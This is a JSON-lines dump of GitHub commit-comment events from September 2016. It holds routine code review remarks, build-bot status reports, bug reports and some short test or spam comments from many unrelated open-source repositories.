{"id":"4606329857","type":"CommitCommentEvent","actor":{"login":"Juansheng"},"repo":{"name":"kamarush/android_device_lge_hammerhead"},"payload":{"comment":{"id":19140283,"position":5,"line":381,"path":"device.mk","commit_id":"ef939f66968090fc8b213b7271f1be363598f427","created_at":"2016-09-23T03:04:20Z","updated_at":"2016-09-23T03:04:20Z","body":"Hi, Just tried this prop, still glitches there. I haven't merged your patches yet."}},"created_at":"2016-09-23T03:04:20Z"}
{"id":"4606342107","type":"CommitCommentEvent","actor":{"login":"leif81"},"repo":{"name":"leif81/bzkanban"},"payload":{"comment":{"id":19140314,"position":216,"line":1130,"path":"index.html","commit_id":"6da32052cbb30debddba62ae9456f8ad17017a6e","created_at":"2016-09-23T03:09:18Z","updated_at":"2016-09-23T03:09:18Z","body":"True that."}},"created_at":"2016-09-23T03:09:18Z"}
{"id":"4606344056","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19140317,"position":null,"line":null,"path":null,"commit_id":"9235685d22508fbbed29a2f81a553749d9219c7f","created_at":"2016-09-23T03:10:07Z","updated_at":"2016-09-23T03:10:07Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-9235685d22508fbbed29a2f81a553749d9219c7f-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-23T03:10:07Z"}
{"id":"4606345230","type":"CommitCommentEvent","actor":{"login":"array88"},"repo":{"name":"Mogara/QSanguosha-For-Hegemony"},"payload":{"comment":{"id":19140321,"position":null,"line":null,"path":null,"commit_id":"8a30f06258de46e6c773bca9d811088a1c03cd11","created_at":"2016-09-23T03:10:33Z","updated_at":"2016-09-23T03:10:33Z","body":"和这个无关的一个bug\r\n沙摩柯蒺藜需要加CardResponded，在里面判断m_isUse，用于回合内使用闪之类的情况（类似的判断身份局技能里应该不少）"}},"created_at":"2016-09-23T03:10:33Z"}
{"id":"4606348538","type":"CommitCommentEvent","actor":{"login":"maorninja"},"repo":{"name":"maorninja/Blargboard-XD"},"payload":{"comment":{"id":19140327,"position":null,"line":null,"path":null,"commit_id":"126559cd6c5335235d33b517efd81771bdbf1189","created_at":"2016-09-23T03:11:46Z","updated_at":"2016-09-23T03:11:46Z","body":"Okay than.\r\n\r\nBTW, phase, I didn't fork your repo because it used BB 1.1 still.\r\n\r\nAlso, none of the current ranks uses JSON."}},"created_at":"2016-09-23T03:11:46Z"}
{"id":"4606348800","type":"CommitCommentEvent","actor":{"login":"jorgebsa"},"repo":{"name":"kvangent/PokeAlarm"},"payload":{"comment":{"id":19140328,"position":5,"line":18,"path":"Dockerfile","commit_id":"81983250b4aecc075ea7a38adf024d335306e9cb","created_at":"2016-09-23T03:11:53Z","updated_at":"2016-09-23T03:11:53Z","body":"nice!"}},"created_at":"2016-09-23T03:11:53Z"}
{"id":"4606353928","type":"CommitCommentEvent","actor":{"login":"reddyabhilash"},"repo":{"name":"reddyabhilash/Propertiesand-behaviours"},"payload":{"comment":{"id":19140340,"position":null,"line":null,"path":null,"commit_id":"43be65a79dfd37a6b791767796b15f18b32b6942","created_at":"2016-09-23T03:13:53Z","updated_at":"2016-09-23T03:13:53Z","body":"\r\n[display.txt](https://github.com/reddyabhilash/Propertiesand-behaviours/files/488797/display.txt)\r\n"}},"created_at":"2016-09-23T03:13:53Z"}
{"id":"4606354300","type":"CommitCommentEvent","actor":{"login":"netpi"},"repo":{"name":"shadowsocks/shadowsocks"},"payload":{"comment":{"id":19140341,"position":null,"line":null,"path":null,"commit_id":"938bba32a4008bdde9c064dda6a0597987ddef54","created_at":"2016-09-23T03:14:01Z","updated_at":"2016-09-23T03:14:01Z","body":"http://tempss.com/ 免费的shadowsocks 账号亲测蛮给力"}},"created_at":"2016-09-23T03:14:01Z"}
{"id":"4606354345","type":"CommitCommentEvent","actor":{"login":"musicus"},"repo":{"name":"ELVIS-Project/vis-framework"},"payload":{"comment":{"id":19140343,"position":null,"line":null,"path":null,"commit_id":"0343bda4071efddd5582e4e695baa11d5af77a7e","created_at":"2016-09-23T03:14:03Z","updated_at":"2016-09-23T03:14:03Z","body":"This object is not being properly picked up by sphinx.\r\n\r\nThe code example that is part of the docstring needs to look the following way:\r\n```\r\n***Examples***\r\n \r\n>>> import music21\r\n>>> import pandas\r\n>>> import vis.analyzers.indexers import noterest, interval, over_bass, fermata, cadence\r\n \r\n>>> score = music21.converter.parse('example.xml')\r\n>>> notes = noterest.NoteRestIndexer(score).run()\r\n>>> intervals = interval.IntervalIndexer(notes).run()\r\n \r\n>>> fermatas = fermata.FermataIndexer(score).run()\r\n \r\n>>> df = pandas.concat([notes, intervals])\r\n>>> overbass = over_bass.OverBassIndexer(df).run()\r\n \r\n>>> settings = {'length': 3}\r\n>>> df = pandas.concat([overbass, fermatas])\r\n \r\n>>> cadences = cadence.CadenceIndexer(df, settings).run()\r\n>>> print(cadences)\r\n\r\n```\r\n\r\nThe docstring should also feature some prose describing what is being done, and why it is important. There also needs to be an example of the desired outcome of when the exact code is being run, with an ```example.xml``` form the ```vis/tests/corpus/``` directory."}},"created_at":"2016-09-23T03:14:03Z"}
{"id":"4606354581","type":"CommitCommentEvent","actor":{"login":"reddyabhilash"},"repo":{"name":"reddyabhilash/Propertiesand-behaviours"},"payload":{"comment":{"id":19140344,"position":null,"line":null,"path":null,"commit_id":"43be65a79dfd37a6b791767796b15f18b32b6942","created_at":"2016-09-23T03:14:09Z","updated_at":"2016-09-23T03:14:09Z","body":"newfileadded"}},"created_at":"2016-09-23T03:14:09Z"}
{"id":"4606359725","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaStats/Distributions.jl"},"payload":{"comment":{"id":19140362,"position":24,"line":152,"path":"src/multivariate/mvlognormal.jl","commit_id":"0d69d8637663916b2c47bea8c3ec633a69f343ae","created_at":"2016-09-23T03:16:15Z","updated_at":"2016-09-23T03:16:15Z","body":"`@compat` isn't doing anything here?"}},"created_at":"2016-09-23T03:16:15Z"}
{"id":"4606363686","type":"CommitCommentEvent","actor":{"login":"kavedder"},"repo":{"name":"socrata/cetera"},"payload":{"comment":{"id":19140368,"position":null,"line":null,"path":null,"commit_id":"e2851bafecc126cf2c8011f53a62911cf8cb22e3","created_at":"2016-09-23T03:17:52Z","updated_at":"2016-09-23T03:17:52Z","body":"It's late. My brain is tired. ;-) hi! "}},"created_at":"2016-09-23T03:17:52Z"}
{"id":"4606367222","type":"CommitCommentEvent","actor":{"login":"williamcroberts"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19140373,"position":13,"line":13,"path":"libselinux/Android.mk","commit_id":"f40d7facbcaf1337f37b5630b98806fd25b1dbf9","created_at":"2016-09-23T03:19:18Z","updated_at":"2016-09-23T03:19:18Z","body":"Delete this"}},"created_at":"2016-09-23T03:19:18Z"}
{"id":"4606368686","type":"CommitCommentEvent","actor":{"login":"williamcroberts"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19140377,"position":16,"line":32,"path":"libselinux/src/label.c","commit_id":"f40d7facbcaf1337f37b5630b98806fd25b1dbf9","created_at":"2016-09-23T03:19:54Z","updated_at":"2016-09-23T03:19:54Z","body":"Don't forget to add no back ends defines to no file."}},"created_at":"2016-09-23T03:19:54Z"}
{"id":"4606370357","type":"CommitCommentEvent","actor":{"login":"romanlukichev"},"repo":{"name":"romanlukichev/CustomerTransaction2"},"payload":{"comment":{"id":19140382,"position":null,"line":null,"path":null,"commit_id":"f7d84a8f60eedf2f113cc5e0498ca7cbc20e907a","created_at":"2016-09-23T03:20:30Z","updated_at":"2016-09-23T03:20:30Z","body":"![screen_2016-09-22 20 19 27](https://cloud.githubusercontent.com/assets/18017741/18773218/fe1176e6-8101-11e6-8cf8-dc220bdaede2.jpg)\r\n"}},"created_at":"2016-09-23T03:20:30Z"}
{"id":"4606370675","type":"CommitCommentEvent","actor":{"login":"loudnate"},"repo":{"name":"ps2/rileylink_ios"},"payload":{"comment":{"id":19140384,"position":5,"line":483,"path":"RileyLinkKit/PumpOpsSynchronous.swift","commit_id":"6a024e6cfc23416c8a6d707505de5e8f4deedb3d","created_at":"2016-09-23T03:20:37Z","updated_at":"2016-09-23T03:20:37Z","body":"If we wanted to try and minimize the duplicate values for x22 pumps, we could add to this logic:\r\n```swift\r\nlet timestampedEvent = TimestampedHistoryEvent(pumpEvent: event, date: date)\r\n\r\nif date.compare(startDate) != .orderedAscending || timestampedEvent.isMutable(at: timeCursor) {\r\n  // ...\r\n}\r\n```"}},"created_at":"2016-09-23T03:20:37Z"}
{"id":"4606371266","type":"CommitCommentEvent","actor":{"login":"leif81"},"repo":{"name":"leif81/bzkanban"},"payload":{"comment":{"id":19140386,"position":62,"line":729,"path":"index.html","commit_id":"ab5cff29f566b35a79bc7a10f7423922f866c1ea","created_at":"2016-09-23T03:20:52Z","updated_at":"2016-09-23T03:20:52Z","body":"Just to be really sure you're appending to the right node you could try this:\r\n\r\n`document.querySelector(\"#\" + bug.status + \" .board-column-container\").appendChild(card)`"}},"created_at":"2016-09-23T03:20:52Z"}
{"id":"4606373531","type":"CommitCommentEvent","actor":{"login":"loudnate"},"repo":{"name":"ps2/rileylink_ios"},"payload":{"comment":{"id":19140389,"position":5,"line":483,"path":"RileyLinkKit/PumpOpsSynchronous.swift","commit_id":"6a024e6cfc23416c8a6d707505de5e8f4deedb3d","created_at":"2016-09-23T03:21:47Z","updated_at":"2016-09-23T03:21:47Z","body":"Do we want to continue to avoid changing the timeCursor in cases where `date.compare(startDate) == .orderedAscending`? I think we might."}},"created_at":"2016-09-23T03:21:47Z"}
{"id":"4606373533","type":"CommitCommentEvent","actor":{"login":"leif81"},"repo":{"name":"leif81/bzkanban"},"payload":{"comment":{"id":19140390,"position":null,"line":null,"path":null,"commit_id":"ab5cff29f566b35a79bc7a10f7423922f866c1ea","created_at":"2016-09-23T03:21:47Z","updated_at":"2016-09-23T03:21:47Z","body":"Resulting board looks 💎 "}},"created_at":"2016-09-23T03:21:47Z"}
{"id":"4606376481","type":"CommitCommentEvent","actor":{"login":"musicus"},"repo":{"name":"ELVIS-Project/vis-framework"},"payload":{"comment":{"id":19140393,"position":null,"line":null,"path":null,"commit_id":"44ae9bcf37c07dd16120b3b2e29f2163a3f4ad59","created_at":"2016-09-23T03:23:00Z","updated_at":"2016-09-23T03:23:00Z","body":"This object is not being picked up by sphinx.\r\n\r\nWhat are contours? What type of contours? Contours according to whom? There should be prose in the docstring that describes these items.\r\n\r\nThe code examples in the ```run()``` method need to look the following way:\r\n\r\n```\r\n>>> import music21\r\n>>> from vis.analyzers.indexers import noterest, contour \r\n\r\n>>> score = music21.converter.parse('example.xml')\r\n>>> notes = noterest.NoteRestIndexer(score).run()\r\n \r\n>>> settings = {'length': 3}\r\n>>> contours = contour.ContourIndexer(notes).run()\r\n>>> print(contours)\r\n```\r\n\r\nThere should also be prose on what this code does, and what its expected outcome would look like.\r\nI recommend reading: [_If Hemingway Wrote JavaScript_](https://www.nostarch.com/hemingway) by Angus Croll."}},"created_at":"2016-09-23T03:23:00Z"}
{"id":"4606382105","type":"CommitCommentEvent","actor":{"login":"macumber"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19140403,"position":null,"line":null,"path":null,"commit_id":"f0188dc975cebe8f64fa2e13af60b172384bb14e","created_at":"2016-09-23T03:25:14Z","updated_at":"2016-09-23T03:25:14Z","body":"@kbenne this might conflict with your MakeWebKitWork branch"}},"created_at":"2016-09-23T03:25:14Z"}
{"id":"4606387347","type":"CommitCommentEvent","actor":{"login":"gkalpak"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":19140412,"position":10,"line":84,"path":"modules/@angular/compiler/src/output/ts_emitter.ts","commit_id":"d4e9af3ccb0f6ec4d610518f9c0435bcb9f9042f","created_at":"2016-09-23T03:27:27Z","updated_at":"2016-09-23T03:27:27Z","body":"@rkirov, shouldn't this be `any[]` (instead of `any`)?"}},"created_at":"2016-09-23T03:27:27Z"}
{"id":"4606388168","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19140414,"position":25,"line":3309,"path":"commands.js","commit_id":"ce9cdecafdcb4e298214e1940e2bacf03bd1ed3a","created_at":"2016-09-23T03:27:48Z","updated_at":"2016-09-23T03:27:48Z","body":"I was going to. :|\r\n\r\nI like the idea of command flags but iirc your format for it was kind of ugly?"}},"created_at":"2016-09-23T03:27:48Z"}
{"id":"4606389314","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19140416,"position":25,"line":3309,"path":"commands.js","commit_id":"ce9cdecafdcb4e298214e1940e2bacf03bd1ed3a","created_at":"2016-09-23T03:28:15Z","updated_at":"2016-09-23T03:28:15Z","body":"Also which comment above?"}},"created_at":"2016-09-23T03:28:15Z"}
{"id":"4606389967","type":"CommitCommentEvent","actor":{"login":"ingbrzy"},"repo":{"name":"xpirt/sdat2img"},"payload":{"comment":{"id":19140419,"position":41,"line":77,"path":"sdat2img.py","commit_id":"8ec97e5644175752f14a6f1c832d244aa93ec909","created_at":"2016-09-23T03:28:32Z","updated_at":"2016-09-23T03:28:32Z","body":"syntax issue.."}},"created_at":"2016-09-23T03:28:32Z"}
{"id":"4606397612","type":"CommitCommentEvent","actor":{"login":"qcind"},"repo":{"name":"getlantern/forum"},"payload":{"comment":{"id":19140431,"position":null,"line":null,"path":null,"commit_id":"ff56363e715dad674c1be70f4241010a315b242e","created_at":"2016-09-23T03:31:38Z","updated_at":"2016-09-23T03:31:38Z","body":"Excuse me?\r\nWhat does these modification mentioned?"}},"created_at":"2016-09-23T03:31:38Z"}
{"id":"4606398563","type":"CommitCommentEvent","actor":{"login":"ddossot"},"repo":{"name":"mikestowe/API-Chaining"},"payload":{"comment":{"id":19140434,"position":6,"line":6,"path":"README.md","commit_id":"498eee618cf7c4aac8a323a4c669e5b841460c15","created_at":"2016-09-23T03:32:02Z","updated_at":"2016-09-23T03:32:02Z","body":"`Ruble` -> `Rubel`\r\n"}},"created_at":"2016-09-23T03:32:02Z"}
{"id":"4606402593","type":"CommitCommentEvent","actor":{"login":"hujundai"},"repo":{"name":"hujundai/tcl"},"payload":{"comment":{"id":19140442,"position":null,"line":null,"path":null,"commit_id":"a931a96eed178972ca5f87cda4fb92c68b677035","created_at":"2016-09-23T03:33:43Z","updated_at":"2016-09-23T03:33:43Z","body":" wrerw  rwrwr"}},"created_at":"2016-09-23T03:33:43Z"}
{"id":"4606402922","type":"CommitCommentEvent","actor":{"login":"Kevin-McIsaac"},"repo":{"name":"ywx649999311/des_ipyleaflet"},"payload":{"comment":{"id":19140443,"position":87,"line":665,"path":"js/src/jupyter-leaflet.js","commit_id":"2816b15a6e1e5a33094e31e7211a243b3f61abda","created_at":"2016-09-23T03:33:52Z","updated_at":"2016-09-23T03:33:52Z","body":"@ywx649999311 It looks like you've fixed a mistake in the LayerGroup here. Are you able to get Layer Groups working? I tried the following\r\n\r\n```\r\ncenter = [-33.858840, 151.206701]\r\nzoom = 50\r\n\r\nm = ll.Map(center=center, zoom=10)\r\nlg = ll.LayerGroup()\r\nlg.layers += [ll.Marker(location=center, title=\"Hello\")]\r\nm += lg\r\nm\r\n```\r\n\r\nbut nothing shows up."}},"created_at":"2016-09-23T03:33:52Z"}
{"id":"4606403528","type":"CommitCommentEvent","actor":{"login":"hallaathrad"},"repo":{"name":"marhyorh/FreeCodeCamp"},"payload":{"comment":{"id":19140447,"position":null,"line":null,"path":null,"commit_id":"2a3cdb0ee5449206b6aa208c37bde1ea5b4321b0","created_at":"2016-09-23T03:34:08Z","updated_at":"2016-09-23T03:34:08Z","body":"Took me forever to realise this PR had been submitted. Thanks for your patience!\r\nInteresting glitch when on smaller screens.\r\n\r\n<img width=\"396\" alt=\"screen shot 2016-09-22 at 23 29 40\" src=\"https://cloud.githubusercontent.com/assets/2107110/18773359/8115805e-811c-11e6-832e-971014b47b5e.png\">\r\n\r\nAlso, could you make the username appear next to the points ( marhyorh [4321] ) when the `menu` button is active?\r\n"}},"created_at":"2016-09-23T03:34:08Z"}
{"id":"4606407814","type":"CommitCommentEvent","actor":{"login":"yourealwaysbe"},"repo":{"name":"osmandapp/OsmAnd-core"},"payload":{"comment":{"id":19140455,"position":null,"line":null,"path":null,"commit_id":"2c0c6e34a16cf0292030baff7ba2c59a064e8743","created_at":"2016-09-23T03:35:58Z","updated_at":"2016-09-23T03:35:58Z","body":"I have tried to follow these build instructions, but for armeabi-android-gcc.sh instead of amd64-linux-gcc.sh.  However, the build fails -- first because the director for libgcc (specified in build/targets/android-gcc.cmake under system_lib_dirs) needs .x after the version number.  After fixing this, linking OsmAndCore_shared_standalone fails because \"-lgnustl_shared\" cannot be found.  I think this has something to do with cmake stripping the system directories from library paths, but have been unable to prevent it (or determine whether i should be seeking to prevent it).\r\n\r\nIs armeabi-android-gcc.sh expected to succeed?\r\n\r\nApologies for posting this here, but i cannot see an issue tracker or a way of sending a message to the developers.  I have started a thread about OsmAnd-core on the google group, but this seems to be a user group rather than a developer group."}},"created_at":"2016-09-23T03:35:58Z"}
{"id":"4606407853","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19140456,"position":null,"line":null,"path":null,"commit_id":"6c5740011c2b1169c869e6f77f36b5ae26534098","created_at":"2016-09-23T03:35:59Z","updated_at":"2016-09-23T03:35:59Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2318 of 2495 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c5740011c2b1169c869e6f77f36b5ae26534098-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c5740011c2b1169c869e6f77f36b5ae26534098-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.91%25-yellow.svg)</a> \n"}},"created_at":"2016-09-23T03:35:59Z"}
{"id":"4606413150","type":"CommitCommentEvent","actor":{"login":"FaisalErr"},"repo":{"name":"FaisalErr/hello-world"},"payload":{"comment":{"id":19140463,"position":null,"line":null,"path":null,"commit_id":"512ceb58f8daf9bfdf4d2b0cc2830085aaf4c004","created_at":"2016-09-23T03:38:17Z","updated_at":"2016-09-23T03:38:17Z","body":"Testing... "}},"created_at":"2016-09-23T03:38:17Z"}
{"id":"4606413226","type":"CommitCommentEvent","actor":{"login":"attadevilwho619"},"repo":{"name":"pylerSM/XInternalSD"},"payload":{"comment":{"id":19140464,"position":null,"line":null,"path":null,"commit_id":"9d886e36d61c1c8ef4949fa880ce6be830e30a76","created_at":"2016-09-23T03:38:19Z","updated_at":"2016-09-23T03:38:19Z","body":"Good tweak to solve storage problems for lollypop"}},"created_at":"2016-09-23T03:38:19Z"}
{"id":"4606421326","type":"CommitCommentEvent","actor":{"login":"jarun"},"repo":{"name":"jarun/calb"},"payload":{"comment":{"id":19140476,"position":null,"line":null,"path":null,"commit_id":"e5ea655602772876fa3b2e16f85417c4ea576aab","created_at":"2016-09-23T03:41:36Z","updated_at":"2016-09-23T03:41:36Z","body":"@wheresmyjetpack would you be interested in this new utility I am writing?\r\n\r\nFor a context, professionally I'm from the storage domain and I desperately wanted to have a utility that does ALL day to day storage conversions, address calculations etc.\r\n\r\nAt this point you can clone and run `calb -h` to see what it has already. I also plan to add CHS <-> LBA conversions. Then whatever users suggest..."}},"created_at":"2016-09-23T03:41:36Z"}
{"id":"4606426247","type":"CommitCommentEvent","actor":{"login":"HAPPYHEARTHAVEN"},"repo":{"name":"wldcordeiro/debugger.html"},"payload":{"comment":{"id":19140488,"position":8,"line":143,"path":"CONTRIBUTING.md","commit_id":"747e5f4326738e50b614bce5c1e28df28146483e","created_at":"2016-09-23T03:43:42Z","updated_at":"2016-09-23T03:43:42Z","body":"Developers Tools and Secrets"}},"created_at":"2016-09-23T03:43:42Z"}
{"id":"4606427356","type":"CommitCommentEvent","actor":{"login":"andy5995"},"repo":{"name":"andy5995/rmw"},"payload":{"comment":{"id":19140489,"position":null,"line":null,"path":null,"commit_id":"4f05d3d8d66df83fb43f1d9ec66d90ac63e1f274","created_at":"2016-09-23T03:44:08Z","updated_at":"2016-09-23T03:44:08Z","body":"> to make sure it's\r\n> `>= 0 || < USHRT_MAX`\r\n\r\n&&... I meant &&! ;)"}},"created_at":"2016-09-23T03:44:08Z"}
{"id":"4606429588","type":"CommitCommentEvent","actor":{"login":"hallaathrad"},"repo":{"name":"marhyorh/FreeCodeCamp"},"payload":{"comment":{"id":19140495,"position":null,"line":null,"path":null,"commit_id":"2a3cdb0ee5449206b6aa208c37bde1ea5b4321b0","created_at":"2016-09-23T03:45:07Z","updated_at":"2016-09-23T03:45:07Z","body":"This happens when you see your profile (and I can imagine it would do so at others' profiles too, but cannot replicate locally)\r\n\r\n<img width=\"1018\" alt=\"screen shot 2016-09-22 at 23 42 02\" src=\"https://cloud.githubusercontent.com/assets/2107110/18773578/56bed916-811e-11e6-9ab2-cad70f595edf.png\">\r\n\r\nFurthermore, it seems like clicking on the avatar+points takes you to the settings panel, rather than the profile. Unexpected behaviour, compared to the current site."}},"created_at":"2016-09-23T03:45:07Z"}
{"id":"4606431631","type":"CommitCommentEvent","actor":{"login":"ywx649999311"},"repo":{"name":"ywx649999311/des_ipyleaflet"},"payload":{"comment":{"id":19140499,"position":87,"line":665,"path":"js/src/jupyter-leaflet.js","commit_id":"2816b15a6e1e5a33094e31e7211a243b3f61abda","created_at":"2016-09-23T03:45:58Z","updated_at":"2016-09-23T03:45:58Z","body":"Hi, I was just fixing typo there. I found another typo in the corresponding part in leaflet.py. Maybe you can try again after correct that typo"}},"created_at":"2016-09-23T03:45:58Z"}
{"id":"4606434823","type":"CommitCommentEvent","actor":{"login":"hanyacode"},"repo":{"name":"hanyacode/helloworld"},"payload":{"comment":{"id":19140505,"position":null,"line":null,"path":null,"commit_id":"69ab70f5cfba2a15ce234c198851aa599267341f","created_at":"2016-09-23T03:47:23Z","updated_at":"2016-09-23T03:47:23Z","body":"第二次修改"}},"created_at":"2016-09-23T03:47:23Z"}
{"id":"4606438318","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19140507,"position":null,"line":null,"path":null,"commit_id":"64ee9ec93e7f2007da3a9bc35df0c5b6981e31eb","created_at":"2016-09-23T03:48:54Z","updated_at":"2016-09-23T03:48:54Z","body":"4989-PreliminaryPIUTstatControl (mjwitte) - x86_64-MacOS-10.9-clang: OK (2338 of 2338 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-64ee9ec93e7f2007da3a9bc35df0c5b6981e31eb-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-64ee9ec93e7f2007da3a9bc35df0c5b6981e31eb-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-23T03:48:54Z"}
{"id":"4606439944","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19140513,"position":null,"line":null,"path":null,"commit_id":"f0188dc975cebe8f64fa2e13af60b172384bb14e","created_at":"2016-09-23T03:49:37Z","updated_at":"2016-09-23T03:49:37Z","body":"os_2_0_fix_static_build (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-f0188dc975cebe8f64fa2e13af60b172384bb14e-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-f0188dc975cebe8f64fa2e13af60b172384bb14e-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-23T03:49:37Z"}
{"id":"4606440954","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"sisl/BayesNets.jl"},"payload":{"comment":{"id":19140518,"position":4,"line":18,"path":"src/BayesNets.jl","commit_id":"35fda5b5baffc58c48e015a4f311b770c75ec8ef","created_at":"2016-09-23T03:50:05Z","updated_at":"2016-09-23T03:50:05Z","body":"This is probably not the real cutoff. Compat uses `isdefined` for this https://github.com/JuliaLang/Compat.jl/pull/253/files"}},"created_at":"2016-09-23T03:50:05Z"}
{"id":"4606440966","type":"CommitCommentEvent","actor":{"login":"HipsterZipster"},"repo":{"name":"apache/cordova-ios"},"payload":{"comment":{"id":19140519,"position":null,"line":null,"path":null,"commit_id":"92a62997adb3c8512328d5a0ae42fe5d156291f1","created_at":"2016-09-23T03:50:05Z","updated_at":"2016-09-23T03:50:05Z","body":"+1 for this commit as well, I'm not sure why this hasn't been merged yet considering that no one can sign from command line without it in XCode 8 and iOS 10???"}},"created_at":"2016-09-23T03:50:05Z"}
{"id":"4606442278","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"sisl/BayesNets.jl"},"payload":{"comment":{"id":19140520,"position":14,"line":53,"path":"src/io.jl","commit_id":"35fda5b5baffc58c48e015a4f311b770c75ec8ef","created_at":"2016-09-23T03:50:35Z","updated_at":"2016-09-23T03:50:35Z","body":"this will likely be a deprecation warning on 0.4, do your tests cover this function?"}},"created_at":"2016-09-23T03:50:35Z"}
{"id":"4606443199","type":"CommitCommentEvent","actor":{"login":"ealfaro97"},"repo":{"name":"MrBents/CS1371_fall16"},"payload":{"comment":{"id":19140521,"position":2,"line":2,"path":"README.md","commit_id":"068470a6b0c0a7918f336c3cf86ddfdd43946386","created_at":"2016-09-23T03:50:59Z","updated_at":"2016-09-23T03:50:59Z","body":"Hi. When are you uploading HW05? "}},"created_at":"2016-09-23T03:50:59Z"}
{"id":"4606443629","type":"CommitCommentEvent","actor":{"login":"eddieridwan"},"repo":{"name":"eddieridwan/OpenSID"},"payload":{"comment":{"id":19140522,"position":null,"line":null,"path":null,"commit_id":"e786a2b8872caf09835ca678ab0a57dfbe74b657","created_at":"2016-09-23T03:51:10Z","updated_at":"2016-09-23T03:51:10Z","body":"@afri18 , sudah saya tambahkan sebagai issue baru di https://github.com/eddieridwan/OpenSID/issues/148. Comment di commit tujuannya lebih untuk memberi komentar teknis penerapan yang dilakukan di commit itu sendiri (misalnya usulan pemakaian variable atau struktur script, dsbnya). Kalau ada fitur baru lebih baik buat issue baru."}},"created_at":"2016-09-23T03:51:10Z"}
{"id":"4606443905","type":"CommitCommentEvent","actor":{"login":"dpogue"},"repo":{"name":"apache/cordova-ios"},"payload":{"comment":{"id":19140524,"position":null,"line":null,"path":null,"commit_id":"92a62997adb3c8512328d5a0ae42fe5d156291f1","created_at":"2016-09-23T03:51:17Z","updated_at":"2016-09-23T03:51:17Z","body":"It has been merged and will be in the next release\n"}},"created_at":"2016-09-23T03:51:17Z"}
{"id":"4606448500","type":"CommitCommentEvent","actor":{"login":"demianhh"},"repo":{"name":"demianhh/sergiomo71"},"payload":{"comment":{"id":19140541,"position":1,"line":1,"path":"README.md","commit_id":"2c0abf949548230ea554cc42277ed8d44dcb7e35","created_at":"2016-09-23T03:53:12Z","updated_at":"2016-09-23T03:53:12Z","body":"Kappa tonymoteren<werke>havefun√"}},"created_at":"2016-09-23T03:53:12Z"}
{"id":"4606453908","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19140557,"position":null,"line":null,"path":null,"commit_id":"990dcd902138ea332aafd8f0b218a71dc32f76aa","created_at":"2016-09-23T03:55:31Z","updated_at":"2016-09-23T03:55:31Z","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2016-09-23T03:55:31Z"}
{"id":"4606454055","type":"CommitCommentEvent","actor":{"login":"fonydolan"},"repo":{"name":"fonydolan/Common"},"payload":{"comment":{"id":19140558,"position":null,"line":null,"path":null,"commit_id":"48257f2fa1c7401ad4a8de3a1d7e84a237a2d813","created_at":"2016-09-23T03:55:35Z","updated_at":"2016-09-23T03:55:35Z","body":"引用传递相当于地址的值传递"}},"created_at":"2016-09-23T03:55:35Z"}
{"id":"4606456056","type":"CommitCommentEvent","actor":{"login":"demianhh"},"repo":{"name":"demianhh/nitro"},"payload":{"comment":{"id":19140561,"position":1,"line":1,"path":"README.md","commit_id":"6890befd996f084dd5f3df6bf257f82dd272f2ff","created_at":"2016-09-23T03:56:27Z","updated_at":"2016-09-23T03:56:27Z","body":"C://run:ip157"}},"created_at":"2016-09-23T03:56:27Z"}
